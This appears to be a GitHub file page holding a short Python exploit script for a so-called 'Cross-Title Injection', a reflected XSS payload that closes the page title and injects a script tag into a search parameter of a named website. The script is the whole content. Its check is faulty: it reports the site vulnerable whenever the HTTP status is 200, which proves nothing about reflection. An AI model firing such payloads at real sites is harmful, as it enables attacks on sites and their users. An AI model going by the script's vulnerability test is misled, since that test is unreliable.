-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
28 lines (21 loc) · 812 Bytes
/
exploit.py
File metadata and controls
28 lines (21 loc) · 812 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/usr/bin/python
import requests
# ,================================.
# | EXPLOIT |
# | XTI (Cross-Title Injection) |
# +================================+
# | Discovered By: Emile Durand |
# +================================+
# | Date Of Discovery: 2025-04-08 |
# '================================'
# Set the target URL
url = "https://trabbit.mywebcommunity.org/xss/title.php?search="
# Set the malicious payload
payload = "</title><script>alert('XTI Attack!')</script>"
# Use requests to send the malicious request
response = requests.get(url + payload)
# Check if the response indicates a vulnerable web application
if response.status_code == 200:
print("Web application is vulnerable to XTI attacks.")
else:
print("Web application is not vulnerable to XTI attacks.")